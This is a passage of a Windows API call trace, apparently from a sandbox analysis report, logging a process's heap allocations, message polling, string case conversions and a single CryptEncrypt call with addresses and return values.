HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0265.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0265.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0265.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0265.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0265.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0265.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0265.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0265.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0265.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0265.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0265.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0265.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0265.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0265.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0265.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0265.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0265.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0265.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0265.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0265.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0265.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0265.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0265.495] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0265.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0265.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0265.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0265.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0265.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0265.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0265.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0265.496] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.496] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0265.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0265.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0265.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0265.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0265.496] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0265.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0265.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0265.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0265.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0265.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0265.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0265.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0265.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2100 [0265.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0265.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0265.497] CharLowerBuffW (in: lpsz="byte[10896]", cchLength=0xb | out: lpsz="byte[10896]") returned 0xb [0265.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0265.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0265.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0265.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0265.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2100 [0265.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0265.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20e0 [0265.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0265.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0265.497] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0265.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0265.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0265.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0265.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0265.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0265.499] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0265.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0265.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0265.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0265.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0265.499] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0265.499] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0265.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0265.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0265.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0265.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0265.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0265.499] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0265.499] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.499] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0265.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0265.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0265.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0265.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0265.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0265.500] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0265.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20e0 [0265.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0265.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0265.501] CryptEncrypt (in: hKey=0xaa5860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3573ab0*, pdwDataLen=0x8bef68*=0x2a8f, dwBufLen=0x2a90 | out: pbData=0x3573ab0*, pdwDataLen=0x8bef68*=0x2a90) returned 1 [0265.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0265.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0265.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2190 [0265.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0265.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0265.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0265.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2180 [0265.501] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0265.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0265.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0265.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0265.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0265.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0265.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0265.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0265.502] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.502] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0265.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0265.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0265.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0265.502] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0265.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0265.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0265.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0265.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0265.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2160 [0265.503] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0265.503] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0265.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0265.503] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0265.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0265.503] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0265.503] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0265.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0265.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0265.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0265.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0265.504] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0265.504] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.504] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0265.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0265.504] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0265.504] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0265.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0265.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0265.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0265.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.505] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0265.505] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.505] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0265.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0265.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0265.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0265.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.505] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.505] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0265.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0265.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0265.505] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0265.505] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0265.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0265.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0265.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0265.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0265.506] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0265.506] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0265.506] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0265.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0265.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0265.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0265.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0265.506] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.506] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.506] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0265.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0265.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0265.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.508] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.508] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.508] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0265.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0265.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.510] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0265.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0265.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0265.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0265.510] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0265.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0265.510] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0265.510] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0265.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0265.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0265.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0265.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0265.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0265.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0265.511] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0265.511] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, 